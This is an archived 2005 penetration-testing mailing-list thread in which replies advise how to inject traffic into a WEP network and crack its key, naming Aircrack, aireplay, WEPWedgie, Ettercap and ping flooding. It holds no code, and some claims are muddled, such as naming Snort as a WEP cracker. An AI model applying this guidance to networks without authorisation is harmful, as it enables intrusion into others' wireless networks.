Penetration Testing mailing list archives
Re: Wireless Pentest Question
From: Brandon Kovacs <liljoker771 () gmail com>
Date: Mon, 7 Feb 2005 12:00:42 -0500
Yes... IP Address of gateway: Use Ettercap Create Traffic- ICMP Ping Flood Tool WEP Key being used: Aircrak or Snort Hope that helps, collecting enough WEP IV's in aircrack can take some time, you will need approx. 200k-500l; depending on the amount of traffic is on the network, that is where the ICMP ping flood tool comes in. Aircrack will crack the WEP key in a few seconds, if you tell it how long the WEP key is, it will do it faster, otherwise you will need to wait a few more seconds -Brandon Kovacs On Mon, 07 Feb 2005 07:06:22 -0500, Joshua Wright <jwright () hasborg com> wrote:
Arvind, Arvind Sood wrote:The problem relates to creating traffic on a wireless network in case you dont find a lot of traffic for a good capture. Is there any way you can create traffic on a WEP network without knowing - the IP Address (address range) the Access Point and wireless clients are using - the WEP key being used (makes sense - that is why you are running a WEP crack)Besides aireplay (not sure why you are getting a SEGFAULT, it worked OK for me - maybe check the Aircrack documentation?), you could use WEPWedgie. This tool was written by Anton Rager a few years ago, and allows you to inject packets into the network after determining PRGA from the WEP challenge/response mechanism. http://www.sf.net/projects/wepwedgie/ The current version relies on the Airjack drivers for operation, meaning you'll have to run it on a Linux 2.4 kernel system. I wrote a small patch to add an option to send ICMP echo requests to the broadcast address (since you might not know any internal addresses), which is available at http://home.jwu.edu/jwright/code/ww-broadcasticmp.diff. Unfortunately, Airjack has some timing issues which makes it somewhat ineffective for injecting large quantities of packets, but this will get you started. While at Shmoocon (you guys rock!) I started re-writing WEPWedgie to port it to a more reliable packet injection framework (and code cleanup) for another project, I'll make that available when I get it finished. Good luck, -Josh -- -Joshua Wright jwright () hasborg com http://home.jwu.edu/jwright/ pgpkey: http://home.jwu.edu/jwright/pgpkey.htm fingerprint: FDA5 12FC F391 3740 E0AE BDB6 8FE2 FC0A D44B 4A73 Today I stumbled across the world's largest hotspot. The SSID is "linksys".
-- -Brandon
Current thread:
- Wireless Pentest Question Arvind Sood (Feb 05)
- RE: Wireless Pentest Question Harshul Nayak (Feb 07)
- Re: Wireless Pentest Question Erik Winkler (Feb 07)
- Re: Wireless Pentest Question Joshua Wright (Feb 07)
- Re: Wireless Pentest Question Brandon Kovacs (Feb 07)
- Re: Wireless Pentest Question Berdt van der Lingen (Feb 08)
- RE: Wireless Pentest Question Harshul Nayak (Feb 07)